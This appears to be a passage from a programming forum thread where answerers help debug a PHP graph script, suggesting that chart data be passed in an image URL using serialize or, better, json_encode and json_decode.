This will also reduce the overhead of multiple requests and prevent hotlinking to the images.
You can read more about data URI's here
http://en.wikipedia.org/wiki/Data_URI_scheme
you might want to try
echo "< img src=\"graph.php?data=".urlencode(serialize($data_daily))."\">"
I might be misunderstanding which script is throwing the error, however (I'm presuming that it's graph.php that's giving you the provided data is not an array).
Try using json instead of serialize
echo "< img src=\"graph.php?data=".urlencode(json_encode($data_daily))."\">"
$graph->parseVerticalPolygonGraph(json_decode($_GET['data'],true), $cfg);
I see no reason for this to throw an error.